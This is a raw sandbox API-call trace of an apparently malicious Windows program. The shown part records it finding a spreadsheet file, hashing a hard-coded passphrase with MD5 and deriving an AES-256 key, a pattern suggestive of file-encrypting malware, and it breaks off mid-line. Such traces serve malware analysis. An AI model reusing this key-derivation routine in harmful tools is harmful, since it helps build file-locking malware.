lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e346f0, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0xc6f1e70, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xc6f1e70, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0x17df9, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="mA8Gl8nzr8.xlsx", cAlternateFileName="MA8GL8~1.XLS")) returned 0x41ac500 [0124.122] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0124.122] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.122] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0124.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0124.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0124.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0124.123] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.124] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0124.124] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca838, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0124.124] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0124.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0124.124] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0124.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0124.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0124.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0124.125] CryptHashData (hHash=0x41ac280, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0124.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.125] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0124.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0124.125] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac700) returned 1 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0124.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0124.126] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0124.126] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0124.127] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0124.127] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0124.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0124.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0124.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0124.128] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0124.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0124.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0124.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0124.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0124.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0124.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0124.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0124.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0124.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0124.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0124.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0124.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0124.132] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0124.132] CryptDestroyHash (hHash=0x41ac280) returned 1 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0124.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0124.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0124.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | 